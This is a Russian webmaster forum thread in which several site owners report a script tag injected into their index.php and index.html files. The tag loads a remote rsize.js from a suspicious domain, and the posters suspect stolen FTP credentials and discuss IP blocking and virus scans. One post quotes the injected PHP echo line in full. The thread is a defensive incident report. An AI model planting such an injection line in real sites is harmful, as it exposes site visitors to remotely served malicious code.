А вот и "левый" код у меня появился

Сообщений: 22227 Регистрация: Май 2011

31 Декабря 2012 14:22

В 7-49 мск одновременно 7 сайтов на 3 разных хостингах, но у одного хостера получили в довесок последней строкой в индексной странице вызов удаленного js-скрипта со странного домена. Причём внедряльщик чётко разделял html от php и внедрялся по-разному (в php через print). Странно, чтопострадали только выборочные сайты, никак не связанные друг с другом ни конкретным IP, ни тематикой, ни внутренней структурой. Код ничего не делал на момент обнаружения, подозреваю, что это готовится сюрприз на "каникулы".
ссылка на внедрённый код была следующей : _http:// kinoshkaxa. changeip. name/rsize.js
Узнать, что он собирался делать мне, видимо, не судьба, к счастью...
Отписался в ТП хостинга, но, блин, 31 декабря... Грешу на свой клиент FTP, в котором я, по-наивности, держал сохраненными пароли от ftp-доступа. Пароли срочно поменял, сохранение, естесственно, отключил.
Чур меня, чур! smile:confused:

Мы не можем похвастаться мудростью глаз
И умелыми жестами рук,
Нам не нужно все это, чтобы друг друга понять.
Сигареты в руках, чай на столе - так замыкается круг,
И вдруг нам становится страшно что-то менять.

Scorpion71

Сообщений: 739 Регистрация: Апр 2011

31 Декабря 2012 14:44

Цитата
Злой, но Позитивный ЧЕЛовек пишет: Грешу на свой клиент FTP, в котором я, по-наивности, держал сохраненными пароли от ftp-доступа.

А почему-бы не поставить блокировку по IP?

Inferno Solutions: Выделенные серверы и VPS по самым низким ценам. От 10$ в месяц!

Злой, но Позитивный ЧЕЛовек

Сообщений: 22227 Регистрация: Май 2011

31 Декабря 2012 14:54

Цитата
Scorpion71 пишет: А почему-бы не поставить блокировку по IP?

дык динамический у меня адрес... мало того, я ещё и дислокацию меняю (в 4 разных совершенно городах живу постоянно), он у меня - супердинамический smile:)

Scorpion71

Сообщений: 739 Регистрация: Апр 2011

31 Декабря 2012 15:20

Цитата
Злой, но Позитивный ЧЕЛовек пишет: дык динамический у меня адрес... мало того, я ещё и дислокацию меняю (в 4 разных совершенно городах живу постоянно), он у меня - супердинамический

Пропиши все свои подсети тогда smile:)

андрей котов

Сообщений: 8 Регистрация: Июн 2011

1 Января 2013 14:15

Такой код echo '<script src="kinoshkaxa.changeip.name/rsize.js"></script>'; и у меня появился в index.php в самом низу, хорошо что каспер среагировал, раньше чем робот яндекса, а то щас бы сидел с пометкой ваш сайт опасен )))

netnsk

Сообщений: 39 Регистрация: Мар 2010

10 Января 2013 08:50

Аналогично. Судя по дате инфицирования - предполагаю, что это результат работы вируса, заражающего hosts на компе, в результате чего появляется надпись STOP "Доступ к сайту запрещен" +7XXXX....
Видимо заражает сайты через "Total Commander" Но принцип заражения не совсем понятен т.к. не все index.php index.html дописывает.

DreamSee Сообщений: 36 Регистрация: Янв 2013	#7 14 Января 2013 15:09 Блокировка по IP ничем не поможет. Скорее всего у Вас троян на компе. Проверяли компьютер на вирусы?

Новые темы	Объявления	Свободное общение
19:12 Продвижение по ключам 09:57 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 19:33 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 17:02 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 15:12 Несколько статей хорошо выдаются в Гугле, но отвратительно в Яндексе 13:40 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 11:41 2Index - быстрая индексация страниц сайта и обратных ссылок	20:45 SnapSwap.io — мгновенный обмен BTC, XMR, ETH, USDT и других криптовалют без регистрации! 18:11 Clearex.io - Больше чем обменник 16:04 Продам базу данных предприятий Украины, России, Великобритании, Германии, Испании, Италии, Нидерландов, Польши, Франции, Швейцарии и др. 13:46 Продвижение сайтов в ТОП Яндекса за 2 недели. Рост позиций и трафика. Бесплатный тест. 12:28 BIGPROXY.SHOP - Резидентные Ротационные Backconnect Proxy USA EUROPA MIX [Безлимитный трафик] 11:31 Продвижение сайтов 03:51 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка	16:49 monetizer.agency – рекламная сеть для взрослого и развлекательного трафика. 100$ новому вебмастеру 20:43 Добро пожаловать в цифровой мир... 15:59 Про мясо 23:09 ПП от PMS remote.team - 200$ за команду 13:28 Компьютерная мышь 22:55 Ну что, кто куда деваете свои сайты? 22:34 Используете беспроводные наушники?

Новые темы

Объявления

Свободное общение

19:12 Продвижение по ключам
09:57 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг
19:33 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options
17:02 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу.
15:12 Несколько статей хорошо выдаются в Гугле, но отвратительно в Яндексе
13:40 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика!
11:41 2Index - быстрая индексация страниц сайта и обратных ссылок

20:45 SnapSwap.io — мгновенный обмен BTC, XMR, ETH, USDT и других криптовалют без регистрации!
18:11 Clearex.io - Больше чем обменник
16:04 Продам базу данных предприятий Украины, России, Великобритании, Германии, Испании, Италии, Нидерландов, Польши, Франции, Швейцарии и др.
13:46 Продвижение сайтов в ТОП Яндекса за 2 недели. Рост позиций и трафика. Бесплатный тест.
12:28 BIGPROXY.SHOP - Резидентные Ротационные Backconnect Proxy USA EUROPA MIX [Безлимитный трафик]
11:31 Продвижение сайтов
03:51 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка

16:49 monetizer.agency – рекламная сеть для взрослого и развлекательного трафика. 100$ новому вебмастеру
20:43 Добро пожаловать в цифровой мир...
15:59 Про мясо
23:09 ПП от PMS remote.team - 200$ за команду
13:28 Компьютерная мышь
22:55 Ну что, кто куда деваете свои сайты?
22:34 Используете беспроводные наушники?